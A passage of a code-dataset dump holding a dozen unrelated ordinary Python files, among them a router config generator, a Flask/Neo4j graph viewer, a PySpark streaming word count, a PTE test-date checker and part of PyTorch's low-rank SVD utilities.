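    print('demo one-time code:', _demo.generate_one_time_code())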
print(\"todo...\")\n","sub_path":"rab_steam.py","file_name":"rab_steam.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"20098691","text":"import inspect\nimport contextlib\nimport io\n\n\ndef write_stat(name, content):\n \"\"\"\n Utility function to pretty-print multi-line information in the following form:\n [Name]: [line 1]\n [line 2]\n ...\n :param name: Name of the stat\n :param content: The potentially multi-line information to be printed\n \"\"\"\n content = content.replace(\"\\n\", \"\\n\\t\")\n print(f\"{name}:\\t{content}\")\n\n\ndef reflect(func):\n \"\"\"\n Quine is a program which takes no input but outputs a copy of its own code.\n So function reflect is not a quine, because:\n 1. It takes function as input.\n 2. Its output depends on a given function rather than producing it by itself.\n\n Decorator that show certain stats and the source code on the wrapped function.\n :param func: Function to be wrapped\n \"\"\"\n\n def wrapper(*args, **kwargs):\n stdout_redir = io.StringIO()\n with contextlib.redirect_stdout(stdout_redir):\n func(*args, **kwargs)\n\n output = stdout_redir.getvalue()\n source = inspect.getsource(func)\n\n sourcelines, _ = inspect.getsourcelines(func)\n \n # Output\n write_stat(\"Name\", func.__name__)\n write_stat(\"Type\", str(type(func)))\n write_stat(\"Sign\", str(inspect.signature(func)))\n print()\n write_stat(\"Args\", f\"positional {args}\\nkey=worded {kwargs}\")\n print()\n write_stat(\"Doc\", str(inspect.getdoc(func)))\n print()\n write_stat(\"Source\", source)\n # For some reason, inspect.getsource adds a newline at the end of the function,\n # thus no print() here\n write_stat(\"Output\", output)\n print()\n\n return wrapper\n","sub_path":"Assignment3/3/reflect.py","file_name":"reflect.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"326896499","text":"import random\nimport math\nimport os\nimport re\nimport sys\n\nimport dijkstras\n\nfrom router import RouteInfos\n\nsys.path.append('../')\n\n# ////////////////////////////// OPTIONS \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ #\n# Router ids must be sequential, starting from 1, skipping no numbers.\nundir_adj_list = \"\"\"\n1:2\n\"\"\"\n\nexample_num = \"10\"\nupdate_period = \"5\"\nmin_cost = 1\nmax_cost = 1\n\n# Used to weight costs.\naverage_cost = None # Can be set to None to have no weighting in the range (min_cost, max_cost)\n# \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ OPTIONS ////////////////////////////// #\n\n# Build the costs list, containing the costs that routers will randomly choose from, if costs arent defined in adj list.\nif average_cost:\n cost_range = max_cost - min_cost + 1\n costs = []\n # Decent guess at costs with given average.\n for i in range(min_cost, max_cost + 1):\n try:\n amount = round(cost_range / (abs(i - average_cost)))\n except ZeroDivisionError:\n amount = cost_range * 5\n costs += [i] * amount\n # Brute force until the average of the costs is far better.\n while True:\n costs_average = sum(costs)/len(costs)\n difference = costs_average - average_cost\n if abs(difference) < 0.0001:\n break\n if difference > 0:\n costs.append(random.randint(min_cost, math.floor(average_cost)))\n else:\n costs.append(random.randint(math.ceil(average_cost), max_cost))\nelse:\n costs = [i for i in range(min_cost, max_cost + 1)]\n\n\n# Check given 
undirected adjacency list\nrouter_ids = set(\n map(\n int,\n [item for item in map(str.strip, re.split(\"[:,]|(?:\\n|\\r\\n|\\r)\", undir_adj_list.strip())) if item.isdigit()]\n )\n)\nexpected_router_ids = set(range(1, int(max(router_ids)) + 1))\nif router_ids != expected_router_ids:\n print(\"Malformed adjacency list given.\")\n print(\"The following router ids were skipped:\", expected_router_ids - router_ids)\n exit()\n\n\nclass Edge(frozenset):\n def __new__(cls, *args):\n return super().__new__(cls, args)\n\n def __str__(self):\n return str(set(map(str, self)))\n\n def __repr__(self):\n return str(set(map(str, self)))\n\n\n# Warn if example configuration already exists.\nconfig_path = \"../configurations/example-\" + example_num + \"/\"\nif os.path.isdir(config_path):\n confirm = input(\n \"Example {} already exists. Enter 'y' to confirm overwrite (will invalidate any diagrams): \".format(example_num)\n ).strip().lower()\n if confirm != \"y\":\n exit()\n\n# Build the edges dictionary, mapping edges (immutable pairs of router ids) to costs (randomly generated), and\n# build the connections dictionary, mapping router ids to the set of routers they are connected to.\nedge_costs = {}\nconnections = {str(i): set() for i in router_ids}\nfor line in undir_adj_list.strip().splitlines():\n line = line.strip()\n parts = line.split(\":\")\n router = parts[0]\n\n full_neighbours = set(parts[1].split(\",\"))\n for neighbour in full_neighbours:\n cost_parts = neighbour.split('w')\n neighbour = cost_parts[0]\n if len(cost_parts) > 1:\n edge_costs[Edge(router, neighbour)] = int(cost_parts[1])\n else:\n edge_costs[Edge(router, neighbour)] = random.choice(costs)\n\n neighbours = set([part.split('w')[0] for part in parts[1].split(\",\")])\n\n connections[router] |= neighbours\n for neighbour in neighbours:\n connections[neighbour] |= {router}\n\n# Build the Graph object.\ngraph = dijkstras.Graph()\nfor router_id in connections:\n graph.add_node(router_id)\nfor edge, cost in edge_costs.items():\n graph.add_edge(*edge, distance=cost)\n\n# Initialise both output matrices.\nnum_routers = len(connections.keys())\nnum_edges = len(edge_costs.keys())\nadjacency_matrix = [[0 for i in range(num_routers)] for j in range(num_routers)]\nincidence_matrix = [[0 for k in range(num_edges)] for l in range(num_routers)]\n\n# Build both output matrices.\nfor edge_num, ((node_1, node_2), cost) in enumerate(edge_costs.items()):\n adjacency_matrix[int(node_1) - 1][int(node_2) - 1] = cost\n adjacency_matrix[int(node_2) - 1][int(node_1) - 1] = cost\n\n incidence_matrix[int(node_1) - 1][edge_num] = cost\n incidence_matrix[int(node_2) - 1][edge_num] = cost\n\n# Cross check matrices validity\npassed = True\nfor column in zip(*incidence_matrix):\n cost = max(column)\n node_1, node_2 = [index + 1 for index, cost in enumerate(column) if cost != 0]\n\n passed = adjacency_matrix[int(node_1) - 1][int(node_2) - 1] == cost if passed else False\n passed = adjacency_matrix[int(node_2) - 1][int(node_1) - 1] == cost if passed else False\ncount = 0\nfor index_1, row in enumerate(adjacency_matrix):\n for index_2, cost in enumerate(row):\n column = [0 for _ in range(num_routers)]\n router_id_1 = index_1 + 1\n column[index_1] = cost\n column[index_2] = cost\n if any(column):\n passed = column in [list(tuple_column) for tuple_column in zip(*incidence_matrix)] if passed else False\n count += 1\npassed = count / 2 == num_edges if passed else False\nif not passed:\n print(\"Sorry! 
Matrices malformed.\")\n exit()\n\n# Build config files needed for router operation.\n\n\ndef pad_zero(str_num):\n if len(str_num) == 2:\n return str_num\n elif len(str_num) == 1:\n return \"0\" + str_num\n\nfor router in connections:\n config = \"router-id \" + router + \"\\n\"\n config += \"input-ports \"\n for neighbour in connections[router]:\n config += \"5\" + pad_zero(router) + pad_zero(neighbour) + \", \"\n config = config[:-2]\n config += \"\\noutputs \"\n for neighbour in connections[router]:\n cost = edge_costs[Edge(router, neighbour)]\n config += \"5\" + pad_zero(neighbour) + pad_zero(router) + \"/\" + str(cost) + \"/\" + neighbour + \", \"\n config = config[:-2]\n config += \"\\nupdate-period \" + update_period\n config_filename = \"example-\" + example_num + \"-config-\" + router + \".txt\"\n os.makedirs(os.path.dirname(config_path), exist_ok=True)\n with open(config_path + config_filename, \"w+\") as config_file:\n config_file.write(config)\n\n# Build expected converged routing table files\nfor router_id in router_ids:\n router_id = str(router_id)\n converged_routing_table = \"{\\n\"\n for target_router_id in router_ids:\n target_router_id = str(target_router_id)\n if router_id == target_router_id:\n continue\n try:\n cost, path = dijkstras.shortest_path(graph, router_id, target_router_id)\n if cost >= 16:\n print(\"WARNING! A minimum cost path of {} was found (16 or higher).\".format(cost))\n input(\"Enter anything to continue...\")\n first_hop = path[1] # path[0] is router_id itself.\n converged_routing_table += '\\t\"{}\": {{\\n'.format(target_router_id)\n converged_routing_table += '\\t\\t\"{}\": {},\\n'.format(RouteInfos.FIRST_HOP, first_hop)\n converged_routing_table += '\\t\\t\"{}\": {}\\n'.format(RouteInfos.COST, cost)\n converged_routing_table += \"\\t},\\n\"\n except KeyError:\n print(\"Could not create a path between two nodes of the graph. 
This probably means the graph described \"\n \"by your adjacency list is disjoint\")\n exit(1)\n converged_routing_table = converged_routing_table[0:-2]\n converged_routing_table += \"\\n}\"\n expected_dir_path = config_path + \"converged-routing-tables/\"\n os.makedirs(os.path.dirname(expected_dir_path), exist_ok=True)\n with open(expected_dir_path + \"routing-table-\" + router_id + \".json\", \"w+\") as expected_file:\n expected_file.write(converged_routing_table)\n\n# Print results.\nprint(\"\\nConfig files successfully created for example network\", example_num + \".\\n\")\nprint(\"VISUALISE USING THIS ONLINE TOOL: http://graphonline.ru/en/\")\nprint(\"\\nADJACENCY MATRIX:\")\nfor line in adjacency_matrix:\n print(\",\".join(map(str, line)))\nprint(\"\\nNO COST ADJACENCY MATRIX:\")\nfor line in adjacency_matrix:\n line = [1 if i != 0 else 0 for i in line]\n print(\",\".join(map(str, line)))\nprint(\"\\nINCIDENCE MATRIX:\")\nfor line in incidence_matrix:\n print(\",\".join(map(str, line)))\n","sub_path":"scripts/example_config_generator.py","file_name":"example_config_generator.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"319231862","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-intel/egg/ndg/xacml/parsers/etree/actionreader.py\n# Compiled at: 2011-02-11 08:34:11\n\"\"\"NDG XACML ElementTree based parser for Action type\n\nNERC DataGrid\n\"\"\"\n__author__ = 'P J Kershaw'\n__date__ = '16/03/10'\n__copyright__ = '(C) 2010 Science and Technology Facilities Council'\n__contact__ = 'Philip.Kershaw@stfc.ac.uk'\n__license__ = 'BSD - see LICENSE file in top-level directory'\n__contact__ = 'Philip.Kershaw@stfc.ac.uk'\n__revision__ = '$Id: actionreader.py 7109 2010-06-28 12:54:57Z pjkersha $'\nfrom ndg.xacml.core.action import Action\nfrom ndg.xacml.parsers.etree.targetchildreader import TargetChildReader\n\nclass ActionReader(TargetChildReader):\n \"\"\"ElementTree based parser for Action type\n @cvar TYPE: XACML type to instantiate from parsed object\n @type TYPE: type\n \"\"\"\n TYPE = Action","sub_path":"pycfiles/ndg_xacml-0.5.1-py2.7/actionreader.py","file_name":"actionreader.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"29781321","text":"import mock\n\nfrom mopidy.utils import locale_decode\n\nfrom tests import unittest\n\n\n@mock.patch('mopidy.utils.locale.getpreferredencoding')\nclass LocaleDecodeTest(unittest.TestCase):\n def test_can_decode_utf8_strings_with_french_content(self, mock):\n mock.return_value = 'UTF-8'\n\n result = locale_decode(\n '[Errno 98] Adresse d\\xc3\\xa9j\\xc3\\xa0 utilis\\xc3\\xa9e')\n\n self.assertEquals(u'[Errno 98] Adresse d\\xe9j\\xe0 utilis\\xe9e', result)\n\n def test_can_decode_an_ioerror_with_french_content(self, mock):\n mock.return_value = 'UTF-8'\n\n error = IOError(98, 'Adresse d\\xc3\\xa9j\\xc3\\xa0 utilis\\xc3\\xa9e')\n result = locale_decode(error)\n\n self.assertEquals(u'[Errno 98] Adresse d\\xe9j\\xe0 utilis\\xe9e', result)\n\n def test_does_not_use_locale_to_decode_unicode_strings(self, mock):\n mock.return_value = 'UTF-8'\n\n locale_decode(u'abc')\n\n self.assertFalse(mock.called)\n\n def test_does_not_use_locale_to_decode_ascii_bytestrings(self, mock):\n mock.return_value = 'UTF-8'\n\n 
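        # Added note, not in the original test: a pure-ASCII byte string
        # decodes without consulting the preferred encoding, which is exactly
        # what the assertion below pins down -- the mocked
        # locale.getpreferredencoding() must never be called on this path.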
locale_decode('abc')\n\n        self.assertFalse(mock.called)\n","sub_path":"tests/utils/decode_test.py","file_name":"decode_test.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"617960780","text":"class Instance(object):\n    def __init__(self, obj):\n        self.id = obj.id\n        self.tags = obj.tags\n        self.size = obj.instance_type\n        self.launch_time = obj.launch_time\n        self._placement = obj.placement\n        self._state = obj.state\n        self._os = guess_os(obj)\n        self._reserved = False\n        self._prices = {\n            'current': 0.0,\n            'best': 0.0,\n        }\n\n    @property\n    def current(self):\n        return self._prices['current']\n\n    @current.setter\n    def current(self, value):\n        self._prices['current'] = value\n\n    @property\n    def best(self):\n        return self._prices['best']\n\n    @best.setter\n    def best(self, value):\n        self._prices['best'] = value\n\n    @property\n    def reserved(self):\n        if self._reserved:\n            return 'Yes'\n        else:\n            return 'No'\n\n    @reserved.setter\n    def reserved(self, value):\n        if value == 'Yes':\n            self._reserved = True\n        elif value == 'No':\n            self._reserved = False\n        else:\n            raise ValueError\n\n    @property\n    def name(self):\n        names = [tag for tag in self.tags if tag['Key'] == 'Name']\n        if not names:\n            return ''\n        else:\n            return names[0]['Value']\n\n    @property\n    def availability_zone(self):\n        return self._placement['AvailabilityZone']\n\n    @property\n    def region(self):\n        return self._placement['AvailabilityZone'][:-1]\n\n    @property\n    def key(self):\n        return self._os[1]\n\n    @property\n    def operating_system(self):\n        return self._os[0]\n\n    @property\n    def state(self):\n        return self._state['Name']\n\n    def match_reserved_instance(self, reserved):\n        if any((self.state != 'running',\n                reserved['State'] != 'active',\n                reserved['InstancesLeft'] == 0,\n                reserved['ProductDescription'] != self.operating_system,\n                reserved['InstanceType'] != self.size,\n                reserved['AvailabilityZone'] != self.availability_zone)):\n            return False\n        return True\n\n\ndef guess_os(instance):\n    console_output = instance.console_output()['Output']\n    if 'Windows' in console_output:\n        return ('Windows', 'win')\n    else:\n        if 'RHEL' in console_output:\n            return ('Red Hat Enterprise Linux', 'rhel')\n        elif 'SUSE' in console_output:\n            return ('SUSE Linux', 'suse')\n        else:\n            return ('Linux/UNIX', 'linux')\n","sub_path":"accloudtant/aws/instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"398577405","text":"# coding=utf-8\nfrom flask import Flask, jsonify, render_template\nfrom neo4j import GraphDatabase\nfrom flask import request\nfrom py2neo import Graph,Node,Relationship\n\ndriver = GraphDatabase.driver(\"bolt://localhost:7687\", auth=(\"neo4j\",\"neo4j\")) # authenticate and connect to the database\n\napp = Flask(__name__) # required Flask framework setup\ngraph = Graph()\n\n\ndef buildNodes(nodeRecord):\n    data = {\"id\": str(nodeRecord.n._id), \"label\": next(iter(nodeRecord.n.labels))}\n    data.update(nodeRecord.n.properties)\n\n    return {\"data\": data}\n\ndef buildEdges(relationRecord):\n    data = {\"source\": str(relationRecord.r.start_node.properties['id']),\n            \"target\": str(relationRecord.r.end_node.properties['id']),\n            \"relationship\": relationRecord.r.rel.type}\n\n    return {\"data\": data}\n\n\n@app.route('/') # create a route pointing to the page\ndef index():\n    return render_template('search.html')\n\n\n@app.route('/searchGraph')\ndef searchGraph():\n    node = request.args.get('wd')\n    print(node)\n    with open(\"node.txt\", 
\"w\") as f:\n f.write(node)\n return render_template('index.html', node=node)\n\n#Laurence\n@app.route('/graph')#两个路由指向同一个网页,返回图的节点和边的结构体\ndef get_graph():\n # nodes = list(map(buildNodes, graph.run('MATCH (n) RETURN n').data()))\n #\n # edges = list(map(buildEdges, graph.run('MATCH ()-[r]->() RETURN r').data()))\n # # elements = {\"nodes\": nodes, \"edges\": edges}\n\n with open(\"node.txt\", \"r\", encoding='utf-8') as f:\n line = f.readlines()\n line = line[0].strip()\n print(\"1.{}\".format(line))\n #\n # with driver.session() as session:\n # # strAll = 'MATCH (p1{name:\"Laurence Fishburne\"})-[r1:ACTED_IN]->(m)<-[r2:DIRECTED]-(p2) RETURN p1,m,p2,r1,r2'\n # #\n # # print(strAll)\n # # results=session.run(strAll).values()\n # # nodeList=[]\n # # edgeList=[]\n # # for result in results:\n # # nodeList.append(result[0])\n # # nodeList.append(result[1])\n # # nodeList.append(result[2])\n # # nodeList=list(set(nodeList))\n # # edgeList.append(result[3])\n # # edgeList.append(result[4])\n # #\n # # nodes = list(map(buildNodes, nodeList))\n # # edges = list(map(buildEdges,edgeList))\n #\n # strNode = \"MATCH (n{name: 'Laurence Fishburne'})-[r]-(p) RETURN n,p,r LIMIT 25\"\n # # strNode = \"MATCH (n:Movie{title: '\" + line + \"'})-[r]-(p) RETURN n,p LIMIT 25\"\n # print(strNode)\n # # nodes = list(map(buildNodes,graph.run(strNode).data()))\n #\n # nodes = []\n # for node in graph.run(strNode).data():\n # nodeResult = buildNodes(node)\n # nodes.append(nodeResult)\n #\n # strEdge = \"MATCH (n{name: 'Laurence Fishburne'})-[r]-(p) RETURN r LIMIT 25\"\n # # strEdge = \"MATCH (n:Movie{title: '\" + line + \"'})-[r]-(p) RETURN r LIMIT 25\"\n # print(strEdge)\n #\n # # edges= list(map(buildEdges,graph.run(strEdge).data()))\n # edges = []\n # for edge in graph.run(strEdge).data():\n # edgeResult = buildEdges(edge)\n # edges.append(edgeResult)\n\n nodes = list(map(buildNodes, graph.cypher.execute('MATCH (n) RETURN n')))\n edges = list(map(buildEdges, graph.cypher.execute('MATCH ()-[r]->() RETURN r')))\n\n return jsonify(elements = {\"nodes\": nodes, \"edges\": edges})\n\nif __name__ == '__main__':\n app.run(debug = True) #flask框架必备","sub_path":"front/neo4j-web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"171906493","text":"import sys\n\nfrom pyspark import SparkContext # allow us to work with spark\nfrom pyspark.streaming import StreamingContext # allow to work with streams in spark\n\nif __name__ == \"__main__\":\n sc = SparkContext(\"local[2]\", \"StreamingCount\")\n sc.setLogLevel(\"WARN\")\n\n ssc = StreamingContext(sc, 2) # 2 is a batchInterval prop of the DStream created by this StreamingContext\n\n ssc.checkpoint('file:///tmp/spark')\n\n lines = ssc.socketTextStream(sys.argv[1], int(sys.argv[2])) # hostname and port\n\n counts = lines.flatMap(lambda line: line.split(\" \"))\\\n .filter(lambda word: \"ERROR\" in word)\\\n .map(lambda word: (word, 1))\\\n .reduceByKeyAndWindow(lambda a, b: a + b, lambda a, b: a - b, 20, 2)\n\n counts.pprint()\n\n ssc.start()\n ssc.awaitTermination()\n\n# ncat -lk 9999\n# spark-submit .\\reduce_by_key_and_window.py localhost 9999\n","sub_path":"reduce_by_key_and_window.py","file_name":"reduce_by_key_and_window.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"534256401","text":"# -*- coding: utf-8 -*-\n# Created by Daniel Liu on 
2017/7/25\nimport datetime\nimport time\nimport traceback\n\nfrom Browser import Browser\nfrom Config import Config\nfrom MailAgent import MailAgent\nfrom lib.Log import Log\n\nreportedDates = {'RMIT': [], 'PEARSON': [], 'CLIFTON': []}\n\n\ndef compareDate(reported, result):\n return reported[\"year\"] == result[\"year\"] and \\\n reported[\"month\"] == result[\"month\"] and \\\n reported[\"day\"] == result[\"day\"]\n\n\ndef processRetrievedData(data, config, log):\n message = \"Available Dates: \\n\"\n needReport = False\n for testCenter in [\"RMIT\", \"PEARSON\", \"CLIFTON\"]:\n # First remove disappeared dates\n for reportedDate in reportedDates[testCenter]:\n needRemove = True\n for result in data[testCenter]:\n if compareDate(reportedDate, result):\n needRemove = False\n if needRemove:\n reportedDates[testCenter].remove(reportedDate)\n # Then determine whether there are dates that needs to be reported\n tomorrow = datetime.date.today() + datetime.timedelta(1)\n for result in data[testCenter]:\n if config.isOnlyReportSpecificMonth() and result['month'] != config.getSpecificMonth():\n log.info('Not Desired Date: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n if config.isOnlyReportCurrentMonth() and result[\"month\"] != tomorrow.month:\n log.info('Not Desired Date: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n if (not config.isReportWithin24HoursAppointments()) and result['day'] == tomorrow.day + 1:\n log.info('Within 24 Hours: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n message += \"{0}: {1}-{2}-{3} \\n\".format(testCenter, result[\"year\"], result[\"month\"], result[\"day\"])\n if len(reportedDates[testCenter]) == 0:\n reportedDates[testCenter].append(result)\n needReport = True\n for reportedDate in reportedDates[testCenter]:\n if compareDate(reportedDate, result):\n continue\n else:\n reportedDates[testCenter].append(result)\n needReport = True\n return message, needReport\n\ndef main():\n logger = Log(\"PTE-ACC\", \"PTEChecker.log\", \"Logs\")\n config = Config(\"PTEChecker.conf\", logger)\n while True:\n try:\n mailAgent = MailAgent(config, logger)\n browser = Browser(config, logger)\n data = browser.startRetrieveData()\n message, needReport = processRetrievedData(data, config, logger)\n if needReport:\n mailAgent.sendEmail(message)\n logger.debug('Message has been sent.')\n if not needReport:\n logger.info('No desired dates.')\n logger.info('Routine check finished.')\n time.sleep(config.getScanIntervals())\n\n except Exception as e:\n logger.error('Error occurred: {0}'.format(e))\n logger.error(traceback.format_exc())\n continue\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"267164924","text":"from .shape import ShapeStructs as ss\r\nfrom .piece import Piece\r\n\r\nclass Player:\r\n\r\n def __init__(self, color, pieceSet):\r\n self.color = color\r\n self.pieceSet = []\r\n for pieceInstructions in pieceSet:\r\n self.pieceSet.append(pieceInstructions)\r\n\r\n def removePiece(self, piece):\r\n for pieceObj in self.pieceSet:\r\n if pieceObj.id == piece.id:\r\n self.pieceSet.remove(pieceObj)\r\n\r\n def piecesAsString(self):\r\n toReturn = ''\r\n divider = ''\r\n for piece in self.pieceSet:\r\n toReturn += 
divider\r\n toReturn += piece.id\r\n divider = ','\r\n return toReturn\r\n\r\n def validatePlayerHasPiece(self, piece):\r\n playerHasPlayedPiece = True\r\n for myPiece in self.pieceSet:\r\n if piece.id == myPiece.id:\r\n playerHasPlayedPiece = False\r\n\r\n if playerHasPlayedPiece:\r\n raise PieceHasBeenPlacedError(\"This piece has been placed\")\r\n\r\nclass Error(Exception):\r\n pass\r\n\r\nclass PieceHasBeenPlacedError(Error):\r\n def __init__(self, message):\r\n self.message = message","sub_path":"backup/blockoo/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"542137854","text":"#!/usr/bin/python\n\nfilerow = []\nrowline = []\ncrimefile = open(\"tahoe-r.txt\", 'r')\nfor line in crimefile.readlines():\n\tline = line.strip()\n\trowline = line.split(\" \")\t\n\tfilerow.append(rowline)\nfilerwo_len = len(filerow)\n\nfilerow2 = []\nrowline2 = []\n\nfor i in range(len(filerow)):\n\trowline2 = []\n\tif( i > 9):\n\t\trowline2.append(filerow[i][1])\n\t\tduration = (80000/(float(filerow[i][1]) -float(filerow[i - 10][1])))\n\t\trowline2.append(duration)\n\t\tfilerow2.append(rowline2)\n\noutput = open(\"tahoe-thr.txt\", 'w')\n\nstring =\"\"\nfor item in filerow2:\n\tstring = str(item[0]) +\" \" + str(item[1]) \t\n\toutput.write(\"%s\\n\" % string)\n\nprint (filerow)\n","sub_path":"CS-252-ComputerNetworksLab/11/tahoe-thr.py","file_name":"tahoe-thr.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"652604716","text":"\"\"\"\nGiven an array of integers, find out whether there are two distinct indices i and j in the array such that the absolute difference between nums[i] and nums[j] is at most t and the absolute difference between i and j is at most k.\n\nExample 1:\n Input: nums = [1,2,3,1], k = 3, t = 0\n Output: true\n\nExample 2:\n Input: nums = [1,0,1,1], k = 1, t = 2\n Output: true\n\nExample 3:\n Input: nums = [1,5,9,1,5,9], k = 2, t = 3\n Output: false\n\"\"\"\n\n\n# too slow\n\"\"\"\ndef containsNearbyAlmostDuplicate(nums, k, t):\n unique_nums = dict()\n for i in range(0, len(nums)):\n if nums[i] not in unique_nums:\n unique_nums[nums[i]] = [i]\n else:\n unique_nums[nums[i]].append(i)\n print(unique_nums)\n\n for unique_num in unique_nums:\n print(unique_num)\n\n for new_unique_num in unique_nums:\n if abs(new_unique_num - unique_num) <= t:\n\n if new_unique_num == unique_num:\n print(\"num2:\" + str(new_unique_num))\n for i in range(0, len(unique_nums[unique_num])):\n for j in range(i + 1, len(unique_nums[unique_num])):\n if unique_nums[unique_num][j] - unique_nums[unique_num][i] <= k:\n return True\n else:\n print(\"num2:\" + str(new_unique_num))\n for i in range(0, len(unique_nums[unique_num])):\n print(\"i: \"+str(i))\n for j in range(0, len(unique_nums[new_unique_num])):\n print(\"j: \" + str(j))\n if abs(unique_nums[unique_num][i] - unique_nums[new_unique_num][j]) <= k:\n return True\n return False\n\"\"\"\ndef containsNearbyAlmostDuplicate(nums, k, t):\n # store the nums and their position into a dict\n unique_nums = dict()\n for i in range(0, len(nums)):\n if nums[i] not in unique_nums:\n unique_nums[nums[i]] = [i]\n else:\n unique_nums[nums[i]].append(i)\n\n print(unique_nums)\n # sort the keys of the dict\n sorted_keys = sorted(unique_nums)\n # the number of distinct keys\n num_of_unique = len(sorted_keys)\n print(sorted_keys)\n\n # iterate through the 
sorted keys to find out the result\n for i in range(0, num_of_unique):\n i_list = unique_nums[sorted_keys[i]]\n print(i_list)\n for j in range(i, num_of_unique):\n # check if the difference of two keys is at most t\n if sorted_keys[j] - sorted_keys[i] <= t:\n print(sorted_keys[j] - sorted_keys[i])\n # check if there are two indexs which have a difference at most k\n if i == j:\n for index in range(0, len(i_list)-1):\n if i_list[index + 1] - i_list[index] <= k:\n return True\n else:\n for index_i in i_list:\n for index_j in unique_nums[sorted_keys[j]]:\n if abs(index_i - index_j) <= k:\n return True\n else:\n # break the loop\n break\n return False\n\n\ninput1 = [1,2,3,1]\nk1 = 3\nt1 = 0\n\ninput2 = [1,0,1,1]\nk2 = 1\nt2 = 2\n\ninput3 = [1,5,9,1,5,9]\nk3 = 2\nt3 = 3\n\ninput4 = [10,100,11,9,100,10]\nk4 = 1\nt4 = 2\n\nprint(containsNearbyAlmostDuplicate(input3, k3, t3))\n\n","sub_path":"LeetCode-Python/220 Contains Duplicate III.py","file_name":"220 Contains Duplicate III.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"264528712","text":"\"\"\"Implement various linear algebra algorithms for low rank matrices.\n\"\"\"\n\n__all__ = ['svd_lowrank', 'pca_lowrank']\n\nfrom typing import Tuple, Optional\n\nimport torch\nfrom torch import Tensor\nfrom . import _linalg_utils as _utils\nfrom ._overrides import has_torch_function, handle_torch_function\n\n\ndef get_approximate_basis(A, # type: Tensor\n q, # type: int\n niter=2, # type: Optional[int]\n M=None # type: Optional[Tensor]\n ):\n # type: (...) -> Tensor\n \"\"\"Return tensor :math:`Q` with :math:`q` orthonormal columns such\n that :math:`Q Q^H A` approximates :math:`A`. If :math:`M` is\n specified, then :math:`Q` is such that :math:`Q Q^H (A - M)`\n approximates :math:`A - M`.\n\n .. note:: The implementation is based on the Algorithm 4.4 from\n Halko et al, 2009.\n\n .. note:: For an adequate approximation of a k-rank matrix\n :math:`A`, where k is not known in advance but could be\n estimated, the number of :math:`Q` columns, q, can be\n choosen according to the following criteria: in general,\n :math:`k <= q <= min(2*k, m, n)`. For large low-rank\n matrices, take :math:`q = k + 5..10`. If k is\n relatively small compared to :math:`min(m, n)`, choosing\n :math:`q = k + 0..2` may be sufficient.\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n Arguments::\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int): the dimension of subspace spanned by :math:`Q`\n columns.\n\n niter (int, optional): the number of subspace iterations to\n conduct; ``niter`` must be a\n nonnegative integer. 
In most cases, the\n default value 2 is more than enough.\n\n M (Tensor, optional): the input tensor's mean of size\n :math:`(*, 1, n)`.\n\n References::\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n \"\"\"\n\n niter = 2 if niter is None else niter\n m, n = A.shape[-2:]\n dtype = _utils.get_floating_dtype(A)\n matmul = _utils.matmul\n\n R = torch.randn(n, q, dtype=dtype, device=A.device)\n\n A_H = _utils.transjugate(A)\n if M is None:\n (Q, _) = matmul(A, R).qr()\n for i in range(niter):\n (Q, _) = matmul(A_H, Q).qr()\n (Q, _) = matmul(A, Q).qr()\n else:\n M_H = _utils.transjugate(M)\n (Q, _) = (matmul(A, R) - matmul(M, R)).qr()\n for i in range(niter):\n (Q, _) = (matmul(A_H, Q) - matmul(M_H, Q)).qr()\n (Q, _) = (matmul(A, Q) - matmul(M, Q)).qr()\n\n return Q\n\n\ndef svd_lowrank(A, q=6, niter=2, M=None):\n # type: (Tensor, Optional[int], Optional[int], Optional[Tensor]) -> Tuple[Tensor, Tensor, Tensor]\n r\"\"\"Return the singular value decomposition ``(U, S, V)`` of a matrix,\n batches of matrices, or a sparse matrix :math:`A` such that\n 